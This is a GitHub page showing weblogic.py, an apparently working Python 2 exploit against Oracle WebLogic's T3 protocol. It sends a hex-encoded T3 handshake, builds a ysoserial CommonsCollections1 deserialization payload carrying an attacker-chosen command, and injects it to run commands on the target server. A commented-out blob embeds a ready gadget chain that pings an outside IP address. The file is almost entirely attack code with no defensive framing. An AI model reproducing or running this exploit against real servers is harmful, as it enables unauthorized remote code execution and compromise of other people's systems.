forked from we8i/weblogic-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
weblogic.py
35 lines (35 loc) · 6.82 KB
/
weblogic.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import socket,ssl,sys,binascii,base64,os
def weblogic(ip,port,cmd):
try:
if (port == 443):
sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (ip, int(port))
print 'connecting to %s port %s' % (server_address,port)
sock.connect(server_address)
#headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
t3 = '74332031322E322E310A41533A3235350A484C3A31390A4D533A31303030303030300A50553A74333A2F2F75732D6C2D627265656E733A373030310A0A'
#a= '00000840016501FFFFFFFFFFFFFFFF000000690000EA60000000182946DA33C66E124576343378D5A54205C404EBBC6A4E332A027973720078720178720278700000000A000000030000000000000000007070707070700000000A000000030000000000000000007006FE010000ACED00057372001D7765626C6F6769632E726A766D2E436C6173735461626C65456E7472792F52658157F4F9ED0C000078707200247765626C6F6769632E636F6D6D6F6E2E696E7465726E616C2E5061636B616765496E666FE6F723E7B8AE1EC90200084900056D616A6F724900056D696E6F7249000C726F6C6C696E67506174636849000B736572766963655061636B5A000E74656D706F7261727950617463684C0009696D706C5469746C657400124C6A6176612F6C616E672F537472696E673B4C000A696D706C56656E646F7271007E00034C000B696D706C56657273696F6E71007E000378707702000078FE010000ACED0005737200257765626C6F6769632E636F7262612E7574696C732E4D61727368616C6C65644F626A656374592161D5F3D1DBB6020002490004686173685B00086F626A42797465737400025B4278707F6CB170757200025B42ACF317F8060854E0020000787000000587ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B4702000078700000000174001770696E67202D632031203136302E31362E3131322E3839740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000000770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003AFE010000ACED0005737200257765626C6F6769632E726A766D2E496D6D757461626C6553657276696365436F6E74657874DDCBA8706386F0BA0C0000787200297765626C6F6769632E726D692E70726F76696465722E426173696353657276696365436F6E74657874E4632236C5D4A71E0C0000787077020600737200267765626C6F6769632E726D692E696E7465726E616C2E4D6574686F6444657363726970746F7212485A828AF7F67B0C000078707734002E61757468656E746963617465284C7765626C6F6769632E73656375726974792E61636C2E55736572496E666F3B290000001B7878FE00FF'
print 'sending "%s"' % t3
sock.sendall(t3.decode('hex'))
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data
cmd = "java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections1 \" %s\" >cmd" % cmd
os.system(cmd)
cmd = binascii.b2a_hex(open('cmd', "rb").read())
payloadh= '00000970016501ffffffffffffffff000000690000ea60000000182946da33c66e124576343378d5a54205c404ebbc6a4e332a027973720078720178720278700000000a000000030000000000000000007070707070700000000a000000030000000000000000007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000'
payloadd= 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
#print binascii.b2a_hex(base64.b64decode(payloadd))
#print base64.b64decode(payloadd)
payload = payloadh+cmd+payloadd
payloadlen = '%s'%'{:04x}'.format(len(payload)/2)
print "len/2:%s"% str(len(payload)/2)
print "payload for hex:%s" % str(payloadlen)
payload = payload.replace('0970',payloadlen)
sock.send(payload.decode('hex'))
print payload
open('cmd', "rb").close
except Exception , e:print "error:"+str(e)
weblogic(sys.argv[1],sys.argv[2],sys.argv[3])
'''123'''